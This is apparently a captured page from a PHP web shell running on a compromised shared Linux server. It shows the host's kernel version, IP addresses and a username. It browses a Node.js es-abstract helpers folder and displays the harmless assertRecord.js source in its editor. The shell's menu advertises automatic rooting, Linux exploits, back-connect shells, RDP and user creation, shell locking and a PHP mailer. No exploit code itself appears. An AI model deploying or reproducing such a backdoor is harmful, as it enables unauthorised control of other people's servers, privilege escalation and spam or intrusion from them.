Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
es-abstract /
helpers /
[ HOME SHELL ]
Name
Size
Permission
Action
DefineOwnProperty.js
1.76
KB
-rw-r--r--
OwnPropertyKeys.js
706
B
-rw-r--r--
assertRecord.js
1.26
KB
-rw-r--r--
assign.js
449
B
-rw-r--r--
callBind.js
85
B
-rw-r--r--
callBound.js
95
B
-rw-r--r--
every.js
193
B
-rw-r--r--
forEach.js
190
B
-rw-r--r--
getInferredName.js
113
B
-rw-r--r--
getIteratorMethod.js
1.06
KB
-rw-r--r--
getOwnPropertyDescriptor.js
262
B
-rw-r--r--
getProto.js
382
B
-rw-r--r--
getSymbolDescription.js
97
B
-rw-r--r--
isByteValue.js
155
B
-rw-r--r--
isCodePoint.js
142
B
-rw-r--r--
isFinite.js
214
B
-rw-r--r--
isLeadingSurrogate.js
157
B
-rw-r--r--
isNaN.js
88
B
-rw-r--r--
isPrefixOf.js
305
B
-rw-r--r--
isPrimitive.js
151
B
-rw-r--r--
isPropertyDescriptor.js
721
B
-rw-r--r--
isSamePropertyDescriptor.js
389
B
-rw-r--r--
isTrailingSurrogate.js
158
B
-rw-r--r--
maxSafeInteger.js
205
B
-rw-r--r--
mod.js
179
B
-rw-r--r--
modBigInt.js
184
B
-rw-r--r--
padTimeComponent.js
220
B
-rw-r--r--
regexTester.js
233
B
-rw-r--r--
setProto.js
444
B
-rw-r--r--
sign.js
89
B
-rw-r--r--
some.js
191
B
-rw-r--r--
timeConstants.js
450
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : assertRecord.js
'use strict'; var GetIntrinsic = require('get-intrinsic'); var $TypeError = GetIntrinsic('%TypeError%'); var $SyntaxError = GetIntrinsic('%SyntaxError%'); var has = require('has'); var predicates = { // https://262.ecma-international.org/6.0/#sec-property-descriptor-specification-type 'Property Descriptor': function isPropertyDescriptor(Type, Desc) { if (Type(Desc) !== 'Object') { return false; } var allowed = { '[[Configurable]]': true, '[[Enumerable]]': true, '[[Get]]': true, '[[Set]]': true, '[[Value]]': true, '[[Writable]]': true }; for (var key in Desc) { // eslint-disable-line if (has(Desc, key) && !allowed[key]) { return false; } } var isData = has(Desc, '[[Value]]'); var IsAccessor = has(Desc, '[[Get]]') || has(Desc, '[[Set]]'); if (isData && IsAccessor) { throw new $TypeError('Property Descriptors may not be both accessor and data descriptors'); } return true; } }; module.exports = function assertRecord(Type, recordType, argumentName, value) { var predicate = predicates[recordType]; if (typeof predicate !== 'function') { throw new $SyntaxError('unknown record type: ' + recordType); } if (!predicate(Type, value)) { throw new $TypeError(argumentName + ' must be a ' + recordType); } };
Close